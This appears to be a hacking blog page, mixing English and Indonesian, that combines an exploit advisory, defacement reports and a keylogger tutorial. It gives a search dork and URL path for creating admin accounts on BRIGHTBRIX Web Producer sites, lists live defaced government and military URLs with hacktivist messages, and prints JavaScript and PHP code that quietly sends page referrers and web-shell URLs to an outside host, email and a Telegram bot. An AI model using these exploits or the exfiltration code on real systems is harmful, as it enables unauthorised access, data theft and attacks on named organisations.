Articles by "Cyber Crime"



=====================================================================
Exploit Title : BRIGHTBRIX® Web Producer Add Admin Vulnerability
Author        : Zaenal Arifin
Exploit Date  : September 06, 2018
Software      : https://www.brightbrix.com/
Vendor    : https://www.brightbrix.com/
Version    : -
Home    : www.bandungdigitalsecurity.org
Tested on     : Windows 7/10 64x - BackBox Linux 5.0 64x
Exploit Risk   : Medium
=====================================================================

Proof of Concept :
Search in google browser or another browser and use the dork :
Dashboard for BRIGHTBRIX® Web Producer - Extending the Internet
and us ur brain to develop this dork.

and Use Exploit :
/user_admin/login_page.php?return_url=%2Fxampp%2Flang.php%3Fen

If vuln then you will find a form to create a new account

and fill in the active e-mail, and check your e-mail for activation of the code and creat ur password, if it is then it will go directly to the dashboard page.

Proof : > https://image.ibb.co/jCa2je/Pwnd.png

Demo : https://www.brightbrix.com/user_admin/login_page.php?return_url=%2Fxampp%2Flang.php%3Fen

===========================================
Contact Me  : 
https://www.facebook.com/darkvenom.gov
zaenalarifin.net@gmail.com
===========================================
=====================================================================
Special Thanks to : Familly Team_CC | AnonGhost | MilWorm | TeaMp0is0N | Fallaga Team
=====================================================================


And it happened again The official website of the Afghanistan Military hacked by AnonGhost, was apparently being hacked by hackers. when our party opened a website that addressed http://www.airman.af.mil  the appearance of Black with the Islamic Images and read "US army + Israeli Army = Children Killersand include a message :

This Message Is Addressed To the United States Government :
you have failed as expected.
for long time,we have witnessed your unjust laws.
you have abused human rights, killed thousands of innocents ,
supported Israel to kill innocent Palestinians in Gaza strip.
bombings houses and mosques,arresting and killing innocent people in Iraq & Afghanistan
using media propaganda to justify your lies and your corrupt act... 
now it's our turn to react
because we are the voice of muslims everywhere.
We are AnonGhost, We are Legion, United as ONE, Divided by ZERO.
We do not forgive Injustice.We do not forget Oppression.
US Government
"We are AnonGhost, We are legion, We do not forgive, We do not forget, Expect us."
you have to Expect Us !

It is not clear whether the website administrator who handles the website has known about this cyber attack. Because until now, the deface display can still be found.

Who does not know the name AnonGhost in its time in 2012-2014 the team is a team that shocked the part of the world where this hacker is a jihad cyber hacking tens of thousands of websites in a few days. after a long time not appearing this time AnonGhost returned and hacked the Afghan Military Site.

Until this news has been posted, there has been no response from the website manager, and still save the file named owned.html, we can see the display in the following archive:
http://www.zone-h.org/mirror/id/31589934

or can directly see at the address:
http://www.airman.af.mil/
http://www.pdg.af.mil/index.php

(Zaenal Arifin)

Baru-baru ini situs Biro Hukum Departemen Kementrian Kesehatan Diretas, pada tanggal 23 Agustus 2018 saat diakses website Biro Hukum Kementrian Kesehatan yang beralamat pada http://hukor.kemkes.go.id/ tampilan berubah menjadi Background Merah Putih dan terpampang sebuah Gambar Meme Para Narapidana Korupsi dan Bertuliskan "SEBANGSAT APAPUN KALIAN JANGAN LUPA TETAP TERSENYUM KARENA SENYUM ADALAH IBADAH" pada gambar tersebut berikut sekilas tampilan nya :


dan berisi pesan yang mengkritik pemerintah berikut Pesan yang disampaikan oleh hacker tersebut :


"Hacked by MrMoonz ft KaizeN"

Di puncak pemimpin yang bebas korupsi, disitulah masa depan negri.
Jangan Benci Negara, Bencilah Pemerintahnya
Karena, Rakyat adalah Kekuatan.
Jangan Benci Hacker, Bencilah Kodenya
Karena, Tidak Ada Sistem yang Aman

Greatz
Res7ock Crew | Ghost Sec-Team | Sanjungan Jiwa

Indonesian Hacker Rulez

dan mencantumkan bebrapa Codenama lain nya Berikut isi kontent yang terpampang pada halaman depan situs biro hukum kementrian kesehatan, tampaknya motif dari serangan ini memiliki arahan terhadap pemerintah yang korup.

Situs Hukor Kementrian Kesehatan ini masih berfungsi seperti semestinya dimana menampilkan informasi-informasi penting.

berikut daftar website yang diretas :

http://hukor.depkes.go.id/
http://hukor.kemkes.go.id/

Setelah diluncurkan nya berita ini belum ada tanggapan serius dari pengelola website. seharusnya ini bisa menjadi perhatian penting bagi pengelola karena ini merupakan hal yang sangat fatal.

(Zaenal Arifin)


Baru baru ini Subdomain dari Situs Komisi Pemberantasan Korupsi alias KPK lebih tepatnya pada Subdomain e-LHKPN KPK Diretas , Peretas tidak merusak tampilan halaman depan namun merusak index dari direktori penyimpanan gambar yaitu pada bagian /images yang beralamat pada : https://elhkpn.kpk.go.id/images/ , Saat dikunjungi Tampilan berubah menjadi Latar putih dan berisikan Sebuah Kata-kata dan sebuah gambar Kartun dimana tulisan tersebut bertuliskan :

"Hacked by MrMoonz" 
[ Indonesian Hacker Rulez ] 

Laughing at your security! Security is just an illusion! 

Copyrights © Rabbit Security Team 2018

Entah apa motif dari kasus peretasan ini Belum jelas apakah administrator website yang menangani website tersebut telah mengetahui kejadian serangan cyber ini. Karena hingga sekarang, tampilan deface tersebut masih dapat ditemui.

Sampai dirunkan nya berita ini belum ada tanggapan dari pihak pengelola website, dan masih menyimpan file yang bernama owned.html , kita bisa melihat tampilan nya di archive berikut :
https://defacer.id/archive/mirror/2586126

atau bisa langsung melihat di alamat :

https://elhkpn.kpk.go.id/images/


(Zaenal Arifin)



Dan Terjadi lagi Website resmi Pasukan Pengamanan Presiden alias Paspampres tampaknya sedang diusili hacker. ketika pihak kami membuka sebuah file yang bernama owned.html tampak tampilan Hitam dengan Logo Devilz Street dan bertuliskan "Owned by Typical Idiot Security"

Belum jelas apakah administrator website Paspampres yang menangani website tersebut telah mengetahui kejadian serangan cyber ini. Karena hingga sekarang, tampilan deface tersebut masih dapat ditemui.

Belum diketahui pula siapakah hacker di balik serangan model deface ini. Domain mil.id sendiri sengaja dibuat PANDI (Pengelola Nama Domain Internet Indonesia) untuk kebutuhan militer.

Kejadian ini pernah terjadi pada Sabtu, 02 Mei 2015 dan kali ini pada tanggal 21 Agustus 2018 Website Resmi Paspampres kembali menjadi target para hacker.

Sampai dirunkan nya berita ini belum ada tanggapan dari pihak pengelola website, dan masih menyimpan file yang bernama owned.html , kita bisa melihat tampilan nya di archive berikut :

http://www.zone-h.org/mirror/id/31589934

atau bisa langsung melihat di alamat :

https://www.paspampres.mil.id/owned.html


(Zaenal Arifin)


Oke Kembali lagi bersama saya kali ini saya akan share tutorial membuat/membongkar key logger di Java Script tepatnya di Jquery buatan Shutdown57 dari JavaCode.


Pada umumnya keylogger dibuat dalam bentuk code PHP namun teknik tersebut sudah diketahui banyak orang dan memunculkan sebuah inspirasi baru dari Shutdown57 untuk tetap menjalankan Keylogger tanpa diketahui yaitu menggunakan ref dari Jquery
Kok bisa dari script jquery ?

yaps disini kita memfungsikan request ajax yang ambil referrer dari shell.
Berikut Code Singkat Jquery nya :


var xhttp = new XMLHttpRequest();xhttp.open("GET", "http://x.linuxcode.org/_.php?ref=" + document.referrer, true);xhttp.send();

Yaps disini kita bisa melihat request dari referrer menuju sebuah link yaitu http://x.linuxcode.org/_.php

nah disinilah letak keylogger nya , dalam intinya keylogger ini sama menggunakan code php namun disini author membuat agar tidak diketahui orang melainkan melalui request referrer dari link lain menggunakan fungsi request dari jquery yang akan diarahkan menuju http:/x.linuxcode.org/_.php agar tidak dapat diketahui orang dan orang akan mengira file jquery ini merupakan fungsi yang seperti biasanya dalam arti (bukan sebuah file berbahaya/hanya untuk memfungsikan style dalam web itu sendiri)

Oke tahap selanjut nya , apa isi dari http:/x.linuxcode.org/_.php ?

yaps jika kita buka maka link tersebut blank atau tidak ada isinya mengapa ? karena ini hanya berisikan code php keylogger tanpa ulasan sedikitpun , oke lalu isi code nya apa ?

Isi dalam file _.php itu code php keylogger

berikut Code nya seperti ini :

<?php@date_default_timezone_set('Asia/Jakarta');error_reporting(0);error_log(0);
if(isset($_GET['ref'])){$url = $_GET['ref'];if(!empty($url)){$sb = "[SHELL][shutdown57][".date('D, d M Y H:i:s')."]";$headers = "From: PROLOGGER <LoggerShell@shutdown57.today>\r\n";$msg = "+------------------------------------------+\n# SHELL LOG ".date('D,d m Y H:i:s')."\n+------------------------------------------+\n# URL :: ".$url."\n+------------------------------------------+\n# JavCode @ 2018 | Powered by : shutdown57\n+------------------------------------------+\n";@mail("indonesianpeople.shutdown57@gmail.com",$sb,$msg,$headers);@file_get_contents('https://api.telegram.org/bot516764791:AAEEnO8F…/sendMessage…);$fp = fopen('sl/JavCode-'.date('dmY').'.txt','a');fwrite($fp,$msg);fclose($fp);}exit;}else{exit('?');}
Yaps itu merupakan isi dari file _.php didalam script keylogger diatas memakai 3 fungsi logger yang akan dikirimkan ke :
  1. Kedalam Server
  2. Kedalam Email @mail()
  3. Kedalam Telegram dengan menggunakan Api Telegram message

Jadi keylogger disini mengmbil dari referrer shell yg berada di http:/x.linuxcode.org/_.php  
terus bagaimana jika shell menggunakan Password ?

Kalian bisa pasang :


echo "<meta http-equiv=refresh content=0;url=?login=".$this->password.">";

untuk ambil variabel password nya

Untuk Cara pemasangan Keylogger Kalian Bisa Baca disini :
Cara Memasang Kylogger di Java Script 

Oke mungkin cukup sekian dan terimakasih semoga bermanfaat

Selamat Beraktifitas kembali

(Zaenal Arifin)


SUICIDE-DB  - Thursday, 12-07-2018. The new site Madza Mobile Venezuela hacked by Indonesian Hackers , those who call themselves Typical Idiot Security back in action, this time the official website of Madza Mobile Venezuela became the target, this hacker managed to exploit the official website Madza Venezuela located at http://mazda.com.ve/free.html, this hacker does not change the look of the front page but instead entrust a file called free.html
which contains the message :


hacked by typical idiot security <3

free prosox



whatever the motive of this attack but in the message can be concluded that they are friends or what I do not know, da in the message convey the message "free Prosox", yes who does not know the name of Prosox, he is a hacker from francis attack the popular site youtube month then

Here's how websites look after hacked:


Mazda Motor Corporation (マ ツ ダ 株式会社 Matsuda Kabushiki-gaisha) (TYO: 7261) is a Japanese automotive company. The company was founded in 1920 and headquartered in Hiroshima, Japan. The company employs 39,364 workers on March 31, 2008. In 2007, Mazda produced 1.3 million cars worldwide. Much of that production (nearly 1 million) is produced at its plant in Japan, with the remainder at other plants around the world.

Until this news is revealed there has been no improvement from related sites. But the site is already being forwarded for archives or alerts that the site has been hacked.

You can see the Archive Mirror database of hackers at :
http://www.zone-h.org/mirror/id/31455443


(Zaenal Arifin)

Bandung Digital Security - Selasa , 08-05-2018. Baru-baru ini situs Pengadilan Militer Makasar dijahili Hacker, Lagi-lagi situs pemerintah Indonesia menjadi Target para Hacker , Kali ini Hacker Bangladesh yang bercode nama Ghost@Terminal Dari Team_CC  ini berhasil meng exploitasi situs pengadilan militer makasar yang beralamat di http://www.dilmil-makassar.go.id/ , hacker ini merubah tampilan halaman depan menjadi background hitam diiringi lantunan lagu underground dan bertuliskan :

Ghost@Terminal 
This website is haunted! 
SECURITY BREACH!
The file you are looking for is not where you think it is."
Haunted by TeaM_CC!

Sekilas Tampilan :



Situs Pengadilan Militer ini merupakan pengadilan yang bertugas untuk memeriksa dan memutus pada tingkat pertama perkara pidana dan sengketa Tata Usaha Militer sebagaimana ditentukan dalam pasal 40 Undang-Undang RI Nomor 31 Tahun 1997 yakni prajurit yang berpangkat Kapten ke bawah.

Yaps siapa yang tidak kenal dengan nama TeaM_CC , team ini merupakan Attacker dari bangladesh yang sangat mengerikan dimana pada bulan-bulan kemarin Team ini berhasil meng exploitasi 2000 website dalam jangka waktu 2 hari. Namun dengan adanya kasus peretasan ini harusnya menjadi perhatian serius bagi pengelola website yang bersangkutan karena mungkin saja selanjutnya akan ada kasus peretasan lain.

Sampai berita ini diturunkan belum ada perbaikan dari situs terkait. Namun situs tersebut sudah dimirrorkan untuk arsip atau tanda bahwa situs tersebut telah diretas. 

Kalian bisa melihat Archive Mirror database para hacker di :
http://zone-h.org/mirror/id/31165789


(Zaenal Arifin)

Zaenal Arifin

{facebook#https://www.facebook.com/darkvenom.gov} {twitter#https://twitter.com/steviefar07} {google-plus#https://plus.google.com/u/0/117673850650242989379} {youtube#https://www.youtube.com/c/KaizenJavaHaxor}

Contact Form

Name

Email *

Message *

Powered by Blogger.
Javascript DisablePlease Enable Javascript To See All Widget